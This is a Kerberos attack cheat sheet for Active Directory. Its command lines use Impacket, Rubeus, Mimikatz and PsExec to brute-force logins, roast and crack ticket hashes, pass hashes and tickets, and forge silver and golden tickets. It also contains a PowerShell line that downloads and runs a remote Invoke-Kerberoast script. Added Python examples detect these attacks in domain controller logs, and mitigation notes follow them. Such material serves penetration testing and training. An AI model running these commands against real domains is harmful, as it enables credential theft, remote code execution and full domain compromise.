Kerberos Attack
January 2020

Introduction

Kerberos is an authentication protocol that identifies a user by proving knowledge of a shared secret (a key derived from the user's password); it authenticates the user but does not validate access to resources, which is left to each service. Kerberos is used in Active Directory.
The following attacks are ordered by the privileges they require. The first ones need only network connectivity to the DC (Domain Controller), which is the KDC (Key Distribution Center) of the AD (Active Directory) network, whereas the last one requires a user who is a Domain Administrator or has equivalent privileges.
  • Kerberos brute-force
  • ASREPRoast
  • Kerberoasting
  • Pass the key
  • Pass the ticket
  • Silver ticket
  • Golden ticket

Kerberos Attack Methods

Tools

Bruteforcing

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

ASREPRoast

# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# Cracking with dictionary of passwords:
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_list_file>
john --wordlist=<passwords_list_file> <AS_REP_responses_file>

Kerberoasting

With Impacket example GetUserSPNs.py:

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

With Powershell:

iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>

Cracking with dictionary of passwords:

hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <TGSs_file>
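The three attacks above (brute force, ASREPRoast, Kerberoasting) each leave a distinctive trace in the DC's Security log: bursts of 4771 pre-authentication failures, 4768 TGT requests with Pre-Authentication Type 0, and 4769 service-ticket requests with RC4 (etype 0x17) from user accounts. The triage below is an added example, not code from the page or from any of the tools it lists; the key=value event format and field names are a constructed simplification of the real event fields.

```python
import re
from collections import Counter

RC4_HMAC = "0x17"  # Ticket Encryption Type logged for RC4-HMAC (etype 23)

# Constructed sample events (one per line), not real log data; fields are simplified.
SAMPLE_EVENTS = """\
id=4771 account=jdoe ip=10.0.0.5 status=0x18
id=4771 account=asmith ip=10.0.0.5 status=0x18
id=4771 account=bjones ip=10.0.0.5 status=0x18
id=4771 account=ckim ip=10.0.0.5 status=0x18
id=4768 account=svc_backup ip=10.0.0.5 preauth=0 etype=0x17
id=4768 account=jdoe ip=10.0.0.9 preauth=2 etype=0x12
id=4769 account=jdoe ip=10.0.0.5 service=MSSQLSvc/db01.corp.local etype=0x17
id=4769 account=jdoe ip=10.0.0.5 service=HTTP/web01.corp.local etype=0x17
id=4769 account=WS01$ ip=10.0.0.7 service=cifs/fs01.corp.local etype=0x12
"""


def parse_events(text):
    """Turn each non-empty key=value line into a dict of its fields."""
    return [dict(re.findall(r"(\w+)=(\S+)", line))
            for line in text.splitlines() if line.strip()]


def triage(events, spray_threshold=3):
    """Return a sorted list of (technique, subject) findings."""
    findings = set()
    # Brute force / password spray: many 4771 with status 0x18 (bad password)
    # coming from a single source address.
    fails = Counter(e["ip"] for e in events
                    if e.get("id") == "4771" and e.get("status") == "0x18")
    for ip, n in fails.items():
        if n >= spray_threshold:
            findings.add(("brute-force", ip))
    for e in events:
        # ASREPRoast: a TGT handed out with no pre-authentication, which only
        # happens for accounts flagged DONT_REQ_PREAUTH.
        if e.get("id") == "4768" and e.get("preauth") == "0":
            findings.add(("asrep-roast", e["account"]))
        # Kerberoasting: RC4 service tickets requested by a user account
        # (machine accounts end in "$" and normally use AES).
        if (e.get("id") == "4769" and e.get("etype") == RC4_HMAC
                and not e["account"].endswith("$")):
            findings.add(("kerberoast", f'{e["account"]}->{e["service"]}'))
    return sorted(findings)
```

Tuning note: a single user requesting RC4 tickets for many distinct SPNs in a short window is the strongest Kerberoasting signal; enabling AES-only service accounts removes the cheap RC4 hashes entirely.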

Pass The Hash (PtH)

Using Impacket examples.
Lab Example: OSCP Lab SV-DC01, SVCClient17x (10.11.1.20 - 10.11.1.24)

# Request the TGT with hash
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with aesKey (more secure encryption and probably stealthier, since it is what Microsoft uses by default)
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with password
python getTGT.py <domain_name>/<user_name>:[password]
# If not provided, the password is asked for interactively

# Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
With Rubeus and PsExec:
# Ask for and inject the ticket
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\<remote_hostname> cmd

Pass The Ticket (PtT)

With Mimikatz:
mimikatz # sekurlsa::tickets /export
With Rubeus in Powershell:
.\Rubeus.exe dump

# Rubeus dumps tickets in base64; to write one to a .kirbi file:
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64_ticket>"))
To convert tickets between Linux/Windows format with ticket_converter.py:
python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

Using ticket in Windows

Inject ticket with Mimikatz:
mimikatz # kerberos::ptt <ticket_kirbi_file>
Inject ticket with Rubeus:
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Execute a cmd in the remote machine with PsExec:
.\PsExec.exe -accepteula \\<remote_hostname> cmd

Silver ticket

With Impacket examples:
# To generate the TGS with the service account's NTLM hash
python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

# To generate the TGS with the service account's AES key
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands with any of the following by using the TGS
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
With Mimikatz:
# To generate the TGS with the service account's NTLM hash
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

# To generate the TGS with the service account's AES 128 key
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<service_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

# To generate the TGS with the service account's AES 256 key (more secure encryption and probably stealthier, since it is what Microsoft uses by default)
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<service_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

# Inject TGS with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>
Inject ticket with Rubeus:
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Execute a cmd in the remote machine with PsExec:
.\PsExec.exe -accepteula \\<remote_hostname> cmd

Golden ticket

With Impacket examples:
# To generate the TGT with the krbtgt NTLM hash
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

# To generate the TGT with the krbtgt AES key
python ticketer.py -aesKey <krbtgt_aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
With Mimikatz:
# To generate the TGT with the krbtgt NTLM hash
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>

# To generate the TGT with the krbtgt AES 128 key
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>

# To generate the TGT with the krbtgt AES 256 key (more secure encryption and probably stealthier, since it is what Microsoft uses by default)
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>

# Inject TGT with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>
Inject ticket with Rubeus:
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Execute a cmd in the remote machine with PsExec:
.\PsExec.exe -accepteula \\<remote_hostname> cmd
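Silver and golden tickets are forged offline, so the KDC never issues them: a golden ticket shows up as TGS requests (4769) for an account that no DC ever logged a TGT for (4768), and a silver ticket as a Kerberos network logon (4624) on a server that no DC logged a matching service-ticket request for. The correlation below is an added example, not code from the page or its tools; it assumes all DCs and the server forward events into one stream, and the key=value format and field names are a constructed simplification.

```python
import re

# Constructed sample events from two DCs and one file server; not real log data.
FORGED_SAMPLE = """\
host=DC01 id=4768 account=alice
host=DC01 id=4769 account=alice service=cifs/FS01
host=FS01 id=4624 account=alice package=Kerberos
host=DC02 id=4769 account=Administrator service=cifs/FS01
host=FS01 id=4624 account=Administrator package=Kerberos
host=FS01 id=4624 account=bob package=Kerberos
host=FS01 id=4624 account=carol package=NTLM
"""


def parse_kv_events(text):
    """Turn each non-empty key=value line into a dict of its fields."""
    return [dict(re.findall(r"(\w+)=(\S+)", line))
            for line in text.splitlines() if line.strip()]


def forged_ticket_findings(events):
    """Return sorted (technique, subject) pairs for tickets the KDC never issued.

    The lookback must cover the TGT lifetime (10 h by default), otherwise a
    legitimate renewal would be flagged; this sample has no timestamps.
    """
    tgt_issued = {e["account"] for e in events if e["id"] == "4768"}
    # (account, target host) pairs for which some DC issued a service ticket
    tgs_issued = {(e["account"], e["service"].split("/")[1].upper())
                  for e in events if e["id"] == "4769"}
    findings = set()
    for e in events:
        # Golden ticket: a service ticket requested with a TGT no DC handed out.
        if e["id"] == "4769" and e["account"] not in tgt_issued:
            findings.add(("possible-golden-ticket", e["account"]))
        # Silver ticket: Kerberos logon at the service host without any 4769
        # for that account and host, i.e. the TGS was forged with the
        # service account's key and never touched the KDC.
        if (e["id"] == "4624" and e.get("package") == "Kerberos"
                and (e["account"], e["host"]) not in tgs_issued):
            findings.add(("possible-silver-ticket", f'{e["account"]}@{e["host"]}'))
    return sorted(findings)
```

Mitigation side: a golden ticket is invalidated only by resetting the krbtgt password twice (the KDC keeps the previous key), and a silver ticket by rotating the compromised service account's key.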

Reference: Kerberos (I): How does Kerberos work? - Theory (Tarlogic Security)